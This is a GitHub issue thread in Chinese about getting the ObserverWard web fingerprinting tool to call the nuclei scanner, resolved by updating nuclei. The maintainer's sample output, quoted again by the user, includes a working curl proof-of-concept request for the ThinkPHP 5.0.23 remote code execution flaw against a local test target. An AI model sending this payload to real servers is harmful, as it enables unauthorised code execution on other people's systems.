nuclei无法调用
kk1270 opened this issue · 4 comments
kk1270 commented
请问师傅咋调用nuclei,试了好久不行
cn-kali-team commented
nuclei加入path环境变量了吗。nuclei的版本是多少
kk1270 commented
nuclei加入path环境变量了吗。nuclei的版本是多少
加入了,我用的是最新版本的nuclei,windows版本的,kali上也试过,都不行,但是都只试了保存到csv
cn-kali-team commented
➜ ~ ./observer_ward -t http://127.0.0.1:8080 --path /home/kali-team/nuclei-templates
__ __ ______ ______ _____
/\ \ _ \ \ /\ __ \ /\ == \ /\ __-.
\ \ \/ ".\ \ \ \ __ \ \ \ __< \ \ \/\ \
\ \__/".~\_\ \ \_\ \_\ \ \_\ \_\ \ \____-
\/_/ \/_/ \/_/\/_/ \/_/ /_/ \/____/
Community based web fingerprint analysis tool.
_____________________________________________
: https://github.com/0x727/FingerprintHub :
: https://github.com/0x727/ObserverWard :
--------------------------------------------
[ http://127.0.0.1:8080 |["thinkphp", "apache-http"] | 931 | 200 | ]
[critical] [thinkphp-5023-rce] | [http://127.0.0.1:8080/index.php?s=captcha]
curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' 'http://127.0.0.1:8080/index.php?s=captcha' --path-as-is -k
Important technology:
+------------------------+-------------+--------+-------------+-------+----------+-------------------+
| url | name | length | status_code | title | priority | plugins |
+========================+=============+========+=============+=======+==========+===================+
| http://127.0.0.1:8080 | thinkphp | 931 | 200 | | 4 | thinkphp-5023-rce |
| | apache-http | | | | | |
+------------------------+-------------+--------+-------------+-------+----------+-------------------+
- 执行这个看看有没有打印json
➜ ~ nuclei -u http://127.0.0.1:8080 -t nuclei-templates/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml -jsonl -duc -silent
kk1270 commented
➜ ~ ./observer_ward -t http://127.0.0.1:8080 --path /home/kali-team/nuclei-templates __ __ ______ ______ _____ /\ \ _ \ \ /\ __ \ /\ == \ /\ __-. \ \ \/ ".\ \ \ \ __ \ \ \ __< \ \ \/\ \ \ \__/".~\_\ \ \_\ \_\ \ \_\ \_\ \ \____- \/_/ \/_/ \/_/\/_/ \/_/ /_/ \/____/ Community based web fingerprint analysis tool. _____________________________________________ : https://github.com/0x727/FingerprintHub : : https://github.com/0x727/ObserverWard : -------------------------------------------- [ http://127.0.0.1:8080 |["thinkphp", "apache-http"] | 931 | 200 | ] [critical] [thinkphp-5023-rce] | [http://127.0.0.1:8080/index.php?s=captcha] curl -X 'POST' -d '_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1' -H 'Accept: */*' -H 'Accept-Language: en' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' 'http://127.0.0.1:8080/index.php?s=captcha' --path-as-is -k Important technology: +------------------------+-------------+--------+-------------+-------+----------+-------------------+ | url | name | length | status_code | title | priority | plugins | +========================+=============+========+=============+=======+==========+===================+ | http://127.0.0.1:8080 | thinkphp | 931 | 200 | | 4 | thinkphp-5023-rce | | | apache-http | | | | | | +------------------------+-------------+--------+-------------+-------+----------+-------------------+
- 执行这个看看有没有打印json
➜ ~ nuclei -u http://127.0.0.1:8080 -t nuclei-templates/http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml -jsonl -duc -silent
谢谢师傅,我把kali的nuclei更新到最新的版本了,之前的版本是2.8.9,提示没有-jsonl命令,我用靶场测试过已经可以正常使用并且可以正常调用nuclei了